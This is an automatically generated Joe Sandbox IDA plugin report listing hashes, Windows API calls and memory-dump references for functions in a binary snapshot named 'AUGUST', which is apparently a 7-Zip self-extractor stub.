                          • Instruction ID: 5f6947e2f47a7d655e02fb84317d9747a35bc7200d49f7273ebe403b31479b31
                          • Opcode Fuzzy Hash: 3eb134fca1680c0093703720a533bafa1d2fd801437f3d80c27f205d784cf8f2
                          • Instruction Fuzzy Hash: C911AD3190410EBACF05FFA1D956CEDBB79AE00708F51806AB511760E1EF78A789DB58
                          APIs
                          • _CxxThrowException.MSVCRT(00000000,00414CFC), ref: 0040E4EE
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: ExceptionThrow
                          • String ID: $JA$4JA$DJA$TJA$hJA$xJA
                          • API String ID: 432778473-803145960
                          • Opcode ID: 8cab838d89dd1577677f775eaf8cb930bb6d64206a7fe5cceb0cff601651d84b
                          • Instruction ID: 5492ea6659e041f1bcf420c4685f7038b08242b420f8f2c51a6428b2159ddc92
                          • Opcode Fuzzy Hash: 8cab838d89dd1577677f775eaf8cb930bb6d64206a7fe5cceb0cff601651d84b
                          • Instruction Fuzzy Hash: 7211A5F0541B419BC7308F16E544587FBF8AF907587218A1FD0AA9BA51D3F8A1888B9C
                          APIs
                            • Part of subcall function 0040BA46: ??2@YAPAXI@Z.MSVCRT(0000000C,?,0040C20C,004149B0,00000001,?,?,00000000), ref: 0040BA4B
                          • ??3@YAXPAX@Z.MSVCRT(00000000,004149B0,00000001,?,?,00000000), ref: 0040C20D
                            • Part of subcall function 0040ADC3: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
                            • Part of subcall function 0040ADC3: memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
                            • Part of subcall function 0040ADC3: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00
                          • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,004149B0,00000001,?,?,00000000), ref: 0040C245
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: ??2@$??3@$memmove
                          • String ID: IA$IA$IA
                          • API String ID: 4294387087-924693538
                          • Opcode ID: 85fc5e494f6b2b84d8098d484c2c91b8b6bfa0a3dc3e29a15476b27879269a5e
                          • Instruction ID: 38d37476858cbe2739f158cf8086d9562841ccd83740beefedbf55b6536d6dac
                          • Opcode Fuzzy Hash: 85fc5e494f6b2b84d8098d484c2c91b8b6bfa0a3dc3e29a15476b27879269a5e
                          • Instruction Fuzzy Hash: 20B1C1B1900209DFCB54EFAAC8819DEBBB5BF48304F50852EF919A7291DB38A945CF54
                          APIs
                          • _CxxThrowException.MSVCRT(00100EC3,00414CFC), ref: 0040E83C
                          • ??2@YAPAXI@Z.MSVCRT(?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?,?,?), ref: 0040E864
                          • memcpy.MSVCRT(00000000,?,?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?), ref: 0040E88D
                          • ??3@YAXPAX@Z.MSVCRT(?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?,?,?), ref: 0040E898
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: ??2@??3@ExceptionThrowmemcpy
                          • String ID: IA
                          • API String ID: 3462485524-3293647318
                          • Opcode ID: 87c970ed3d1d6bacfe04aab15aff8add49b6e5554cbd4f9de67434676486f6a2
                          • Instruction ID: e9362666a157510f6fc1816af10740f0f0ab3f4ff6eb75305f8b2a096945a613
                          • Opcode Fuzzy Hash: 87c970ed3d1d6bacfe04aab15aff8add49b6e5554cbd4f9de67434676486f6a2
                          • Instruction Fuzzy Hash: 6811E5736003009BCB28AF57D880D6BFBE9AB84354714C83FEA59A7290D779E8954794
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: wsprintf$ExitProcesslstrcat
                          • String ID: 0x%p
                          • API String ID: 2530384128-1745605757
                          • Opcode ID: beb3389330693802dd4b40a551927b7f0c9c9e0999a7fc1e7fc7f64098bb755c
                          • Instruction ID: 6c9eba3c29ae2a0cc7ccd16f79f39b6d6218d418ab2b897ff95ca6c62132cda7
                          • Opcode Fuzzy Hash: beb3389330693802dd4b40a551927b7f0c9c9e0999a7fc1e7fc7f64098bb755c
                          • Instruction Fuzzy Hash: CF019E7580020CAFDB20AFA0DC45FDA777CBF44305F04486AF945A2081D738F6948FAA
                          APIs
                            • Part of subcall function 004071B8: GetSystemMetrics.USER32(0000000B), ref: 004071E0
                            • Part of subcall function 004071B8: GetSystemMetrics.USER32(0000000C), ref: 004071E9
                          • GetSystemMetrics.USER32(00000007), ref: 00407A51
                          • GetSystemMetrics.USER32(00000007), ref: 00407A62
                          • ??3@YAXPAX@Z.MSVCRT(?,000004B8,?,?), ref: 00407B29
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: MetricsSystem$??3@
                          • String ID: 100%%
                          • API String ID: 2562992111-568723177
                          • Opcode ID: 8625fd62ee8a1587f51b59dec5492359d41c9a7e7955315cbfbb4a3169dab2fe
                          • Instruction ID: d2e8aa6d75c6757367bbc63d1236441fd7733528c0e5853e38aed7656a5d7d9b
                          • Opcode Fuzzy Hash: 8625fd62ee8a1587f51b59dec5492359d41c9a7e7955315cbfbb4a3169dab2fe
                          • Instruction Fuzzy Hash: 0D31D771A047059FCB24DFA9C9419AEB7F4EF40308B00012EE542A26E1DB78FE44CF99
                          APIs
                          • wsprintfW.USER32 ref: 00407A12
                            • Part of subcall function 0040725A: GetDlgItem.USER32(?,?), ref: 00407264
                            • Part of subcall function 0040725A: GetWindowTextLengthW.USER32(00000000), ref: 0040726B
                          • GetDlgItem.USER32(?,000004B3), ref: 004079C6
                            • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
                            • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
                          • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 004079E4
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: TextWindow$ItemLength$??3@wsprintf
                          • String ID: (%u%s)
                          • API String ID: 3595513934-2496177969
                          • Opcode ID: 81108d5736a162b6d9564d3eb7a2e93f5e39dd0108d0485d36b03b99dec63073
                          • Instruction ID: 1b031bef2a273fddd3247fbc9e57f9590cc69a100d620b238320e5a3a24b3f72
                          • Opcode Fuzzy Hash: 81108d5736a162b6d9564d3eb7a2e93f5e39dd0108d0485d36b03b99dec63073
                          • Instruction Fuzzy Hash: 1401C8B15042147FDB107B65DC46EAF777CAF44708F10807FF516A21E2DB7CA9448A68
                          APIs
                          • LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,0000003C,?,?,?,?,?,?,00406130,?,00000000,?,?,?), ref: 0040220A
                          • GetProcAddress.KERNEL32(00000000), ref: 00402211
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: GetNativeSystemInfo$kernel32
                          • API String ID: 2574300362-3846845290
                          • Opcode ID: dcc7844bde5d914e3d472255d944d602bbefc6ee0fc65a521985863f2fff9548
                          • Instruction ID: b757a3d5c4c17e34abb063926c294d8abaed4bc4edbc3347b9308a3de004b423
                          • Opcode Fuzzy Hash: dcc7844bde5d914e3d472255d944d602bbefc6ee0fc65a521985863f2fff9548
                          • Instruction Fuzzy Hash: 88F0B432E1521495CF20BBF48B0D6EF66E89A19349B1004BBD852F31D0E5FCCE8141EE
                          APIs
                          • LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,004061B1,?,?,?), ref: 00402198
                          • GetProcAddress.KERNEL32(00000000), ref: 0040219F
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: Wow64RevertWow64FsRedirection$kernel32
                          • API String ID: 2574300362-3900151262
                          • Opcode ID: e5c6d40c89fc1f3fb34c79c32c3445fbc861d0d884c7149ba98d4f5b826d618a
                          • Instruction ID: b94e249185ae4a70534d65e1a66e6cdcdba3a47a1e4784fabdbc91f5644b18b3
                          • Opcode Fuzzy Hash: e5c6d40c89fc1f3fb34c79c32c3445fbc861d0d884c7149ba98d4f5b826d618a
                          • Instruction Fuzzy Hash: AFD0C934294201DBDB125FA0EE0E7EA3AB9FB04B0BF458035A920A00F0CBBC9644CA5C
                          APIs
                          • LoadLibraryA.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,0040223A), ref: 004021CA
                          • GetProcAddress.KERNEL32(00000000), ref: 004021D1
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: Wow64DisableWow64FsRedirection$kernel32
                          • API String ID: 2574300362-736604160
                          • Opcode ID: 5a0f418ac3e49e57b967c4010738a21a45af66be6bd625357fa5c872d0fae828
                          • Instruction ID: 817513c890d082da38b6284c2862a66e2f32a8da2897575df7e5c1eb8648f331
                          • Opcode Fuzzy Hash: 5a0f418ac3e49e57b967c4010738a21a45af66be6bd625357fa5c872d0fae828
                          • Instruction Fuzzy Hash: 0DD012342443009BDB515FA09E0D7DA3EB4B705B07F508076A520E11D1CBFCA244C7AC
                          APIs
                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402B6F
                            • Part of subcall function 0040272E: MultiByteToWideChar.KERNEL32(00000020,00000000,00000024,?,00000000,?,?,00000020,00000024,00000000,00402ACD,?,?,00000000,00000000,00000000), ref: 00402760
                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402ADC
                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?), ref: 00402AF7
                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C), ref: 00402AFF
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: ??3@$ByteCharMultiWide
                          • String ID:
                          • API String ID: 1731127917-0
                          • Opcode ID: ae4930b9035af11edc18eb83865398ea889af843cb2bb96c85f7d9ecca2ecb95
                          • Instruction ID: 3903ebf3ba6088976d83fc344d3b185d6a20d7f45533e28e7dbc13297377a7b4
                          • Opcode Fuzzy Hash: ae4930b9035af11edc18eb83865398ea889af843cb2bb96c85f7d9ecca2ecb95
                          • Instruction Fuzzy Hash: 2831B3729041156ACB14FFA6DD81DEFB3BCEF00714B51403FF952B31E1EA38AA458658
                          APIs
                          • GetTempPathW.KERNEL32(00000001,00000000,00000002,00000000,00406437,00000000,?,?,00404B63,?,7ZSfx%03x.cmd), ref: 00403FA8
                          • GetTempPathW.KERNEL32(00000001,00000000,00000001,?,?,00404B63,?,7ZSfx%03x.cmd), ref: 00403FC5
                          • wsprintfW.USER32 ref: 00403FFB
                          • GetFileAttributesW.KERNEL32(?), ref: 00404016
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: PathTemp$AttributesFilewsprintf
                          • String ID:
                          • API String ID: 1746483863-0
                          • Opcode ID: 013dbc26b67ec8e4cb6dbc59edbfaa415160c5e99e9f4e95bea1135156e91aed
                          • Instruction ID: 4b01c17e8612d334da970e7aef70975a1f373095b445c13461924cc76c43a46f
                          • Opcode Fuzzy Hash: 013dbc26b67ec8e4cb6dbc59edbfaa415160c5e99e9f4e95bea1135156e91aed
                          • Instruction Fuzzy Hash: 1B113672100204BFCB01AF59CC85AADB7F8FF88755F50802EF905972E1DB78AA008B88
                          APIs
                          • CharUpperW.USER32(?,7622E0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
                          • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
                          • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401B03
                          • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401B13
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: CharUpper
                          • String ID:
                          • API String ID: 9403516-0
                          • Opcode ID: 18230d7c19ca01b706053a4839b324d461c93759ef2237e6a4782e95e1545131
                          • Instruction ID: 0ba0c8867aa888139ba8faa8f8ff432121b60ad667f2455bf366b55ac651d143
                          • Opcode Fuzzy Hash: 18230d7c19ca01b706053a4839b324d461c93759ef2237e6a4782e95e1545131
                          • Instruction Fuzzy Hash: 02112E34A11269ABCF108F99C8446BAB7E8FF44356B504467F881E3290D77CDE51EB64
                          APIs
                            • Part of subcall function 0040690F: GetDlgItem.USER32(?,?), ref: 0040691B
                            • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                            • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00407FED
                          • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 0040800D
                          • GetDlgItem.USER32(?,000004B7), ref: 00408020
                          • SetWindowLongW.USER32(00000000,000000FC,Function_00006F37), ref: 0040802E
                            • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                            • Part of subcall function 00407D06: LoadIconW.USER32(00000000), ref: 00407D33
                            • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000032), ref: 00407D43
                            • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000031), ref: 00407D48
                            • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                            • Part of subcall function 00407D06: LoadImageW.USER32(00000000), ref: 00407D54
                            • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                            • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                            • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E76
                            • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E92
                            • Part of subcall function 004072DD: GetDlgItem.USER32(?,000004B6), ref: 004072EA
                            • Part of subcall function 004072DD: SetFocus.USER32(00000000,?,?,004073B2,000004B6,?), ref: 004072F1
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: ItemWindow$System$HandleLoadMessageMetricsModuleSend$DirectoryFileFocusIconImageInfoLongShow
                          • String ID:
                          • API String ID: 2538916108-0
                          • Opcode ID: a74d79fd4605bc1a7757bdbc28ebf3a23631424810f8539fda01f9cd24d05c25
                          • Instruction ID: 9218ed989044434557cb474aaa53437228351995edfdd36a91d94446a14b3a18
                          • Opcode Fuzzy Hash: a74d79fd4605bc1a7757bdbc28ebf3a23631424810f8539fda01f9cd24d05c25
                          • Instruction Fuzzy Hash: 7D1186B1A402146BCB10BBB99D09F9EB7FDEB84B04F00446EB652E31C0D6B8DA008B54
                          APIs
                          • SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 00406814
                          • GetSystemMetrics.USER32(00000031), ref: 0040683A
                          • CreateFontIndirectW.GDI32(?), ref: 00406849
                          • DeleteObject.GDI32(00000000), ref: 00406878
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
                          • String ID:
                          • API String ID: 1900162674-0
                          • Opcode ID: 5f8418ac61918c0235adc1083e46979a63813a21cc36a9cb80778b220a455722
                          • Instruction ID: e152b01862f646c7a4819b14062263d5307cf72e2961abd6127bac75ebed32e6
                          • Opcode Fuzzy Hash: 5f8418ac61918c0235adc1083e46979a63813a21cc36a9cb80778b220a455722
                          • Instruction Fuzzy Hash: A9116376A00205AFDB10DF94DC88FEAB7B8EB08300F0180AAED06A7291DB74DE54CF54
                          APIs
                          • memset.MSVCRT ref: 0040749F
                          • SHBrowseForFolderW.SHELL32(?), ref: 004074B8
                          • SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 004074D4
                          • SHGetMalloc.SHELL32(00000000), ref: 004074FE
                            • Part of subcall function 004072DD: GetDlgItem.USER32(?,000004B6), ref: 004072EA
                            • Part of subcall function 004072DD: SetFocus.USER32(00000000,?,?,004073B2,000004B6,?), ref: 004072F1
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: BrowseFocusFolderFromItemListMallocPathmemset
                          • String ID:
                          • API String ID: 1557639607-0
                          • Opcode ID: a8285b8de4733da597857d8c27af206edc1c0a360700d70dd9a7d2ed45ada19f
                          • Instruction ID: 30b51fec80d89fd3ac1614d0428bedaa433d1aa4d1a510c8e8bcd0531de43efe
                          • Opcode Fuzzy Hash: a8285b8de4733da597857d8c27af206edc1c0a360700d70dd9a7d2ed45ada19f
                          • Instruction Fuzzy Hash: 43112171A00114ABDB10EBA5DD48BDE77FCAB84715F1040A9E505E7280DB78EF05CB75
                          APIs
                          • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,00000000), ref: 004027F8
                          • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00402801
                            • Part of subcall function 0040112B: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
                            • Part of subcall function 0040112B: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171
                          • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,00000001,00000000,?,00000000,00000000,00000000), ref: 00402819
                          • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00402839
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
